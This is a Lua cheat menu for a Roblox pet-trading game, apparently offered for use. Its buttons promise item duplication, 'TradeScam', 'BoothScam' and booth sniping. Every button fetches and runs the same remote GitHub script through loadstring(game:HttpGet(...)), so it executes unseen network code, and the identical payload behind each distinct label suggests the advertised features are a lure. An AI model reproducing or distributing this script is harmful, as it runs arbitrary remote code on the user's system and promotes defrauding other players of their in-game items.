local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))()
local Window = Library.CreateLib("SethScriptHub", "GrapeTheme")
local Main = Window:NewTab("Main")
local MainSection = Main:NewSection("AutoFarm")
MainSection:NewButton("Auto Farm", "AutoFarm (Wait for 5 sec", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)

local MainSection = Main:NewSection("AUTO HATCH(wait for 30 secs after clicking button)")
MainSection:NewButton("AUTO HATCH", "OP DUPE SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)


local DUPE = Window:NewTab("Dupe")
local DUPESection = DUPE:NewSection("DUPE GEMS(.)")
DUPESection:NewButton("DUPE GEMS(Wait For 30 Secs after clicking button", "OP DUPE SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)

local DUPESection = DUPE:NewSection("DUPE(.)")
DUPESection:NewButton("DUPE PET (Wait for 30 secs after clicking button", "OP DUPE SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)
local DUPESection = DUPE:NewSection("DUPE ALL EQUIPPED PET(Thanks For Using)")
DUPESection:NewButton("DUPE ALL EQUIPPED PET", "OP DUPE SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)
local TradeScam = Window:NewTab("TradeScam")
local TradeScamSection = TradeScam:NewSection("ONLY FOR TRADING(WAIT FOR 30 SEC TO WORK)")
TradeScamSection:NewButton("TRADESCAM ONLY FOR TRADING)", "OP TRADESCAM SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)

local BoothScam = Window:NewTab("BoothScam")
local BoothScamSection = BoothScam:NewSection("BOOTHSCAM(wait for 30 sec after clicking button)")
BoothScamSection:NewButton("BOOTHSCAM(Wait For 30 Sec after clicking button", "OP DUPE SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)
local BoothScamSection = BoothScam:NewSection("BOOTH SNIPING(UPON clicking button)")
BoothScamSection:NewButton("BOOTHSNIPING", "OP BoothSniping SCRIPT", function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/ProjectSeth/ProjectSethNewV2/main/PsxScript.lua"))()
end)


local Credits = Window:NewTab("Credits")
local CreditsSection = Credits:NewSection("Made By Seth(Thanks For Using)")
local CreditsSection = Credits:NewSection("Credits to Seth")
